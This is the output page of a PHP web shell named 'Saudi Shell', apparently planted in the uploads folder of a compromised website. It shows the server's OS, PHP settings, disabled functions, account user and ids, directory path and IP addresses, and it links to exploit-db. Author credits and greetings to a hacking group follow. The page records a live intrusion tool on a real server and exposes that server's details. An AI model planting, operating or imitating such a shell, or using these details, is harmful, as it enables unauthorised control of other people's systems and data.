Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.1    | ip server : 37.27.141.47 |  list site |  phpinfo |
Saudi Shell

Coded By : al-swisre
E-mail : oy3@hotmail.com
From : Saudi Arabian
Age : 2/1995
twitter : al_swisre
S.Greetz 2 : Mr.Alsa3ek - Ejram Hacker
Greetz 2 : e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy
And : Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com